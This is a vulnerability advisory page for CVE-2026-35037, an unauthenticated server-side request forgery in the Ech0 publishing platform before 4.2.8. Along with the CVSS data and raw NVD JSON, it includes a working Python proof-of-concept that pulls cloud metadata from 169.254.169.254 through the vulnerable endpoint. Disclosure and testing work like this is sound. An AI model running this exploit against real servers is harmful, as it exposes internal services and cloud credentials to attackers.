Security Vulnerability Report
中文
CVE-2026-35037 CVSS 7.2 HIGH

CVE-2026-35037

Published: 2026-04-06 17:17:13
Last Modified: 2026-04-22 18:59:56
Source: [email protected]

Description

Ech0 is an open-source, self-hosted publishing platform for personal idea sharing. Prior to 4.2.8, the GET /api/website/title endpoint accepts an arbitrary URL via the website_url query parameter and makes a server-side HTTP request to it without any validation of the target host or IP address. The endpoint requires no authentication. An attacker can use this to reach internal network services, cloud metadata endpoints (169.254.169.254), and localhost-bound services, with partial response data exfiltrated via the HTML <title> tag extraction This vulnerability is fixed in 4.2.8.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ech0:ech0:*:*:*:*:*:*:*:* - VULNERABLE
Ech0 < 4.2.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_ssrf(target_host): """ Exploit CVE-2026-35037: Ech0 SSRF via /api/website/title """ # Vulnerable endpoint endpoint = "/api/website/title" # Target internal service (e.g., AWS Metadata) # Note: In a real test, replace with a controlled internal domain payload_url = "http://169.254.169.254/latest/meta-data/ami-id" full_url = f"http://{target_host}{endpoint}?website_url={payload_url}" try: response = requests.get(full_url, timeout=5) if response.status_code == 200: print(f"[+] Request sent to: {full_url}") print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Body: {response.text}") if "ami-" in response.text or response.text != "": print("[!] Potential SSRF vulnerability confirmed!") else: print(f"[-] Unexpected status code: {response.status_code}") except Exception as e: print(f"[-] Error occurred: {e}") if __name__ == "__main__": target = "example.com" # Replace with actual target check_ssrf(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35037", "sourceIdentifier": "[email protected]", "published": "2026-04-06T17:17:13.093", "lastModified": "2026-04-22T18:59:55.523", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ech0 is an open-source, self-hosted publishing platform for personal idea sharing. Prior to 4.2.8, the GET /api/website/title endpoint accepts an arbitrary URL via the website_url query parameter and makes a server-side HTTP request to it without any validation of the target host or IP address. The endpoint requires no authentication. An attacker can use this to reach internal network services, cloud metadata endpoints (169.254.169.254), and localhost-bound services, with partial response data exfiltrated via the HTML <title> tag extraction This vulnerability is fixed in 4.2.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ech0:ech0:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.2.8", "matchCriteriaId": "9571E0F6-6EAF-4AFD-AE06-4E579DFE798A"}]}]}], "references": [{"url": "https://github.com/lin-snow/Ech0/security/advisories/GHSA-cqgf-f4x7-g6wc", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.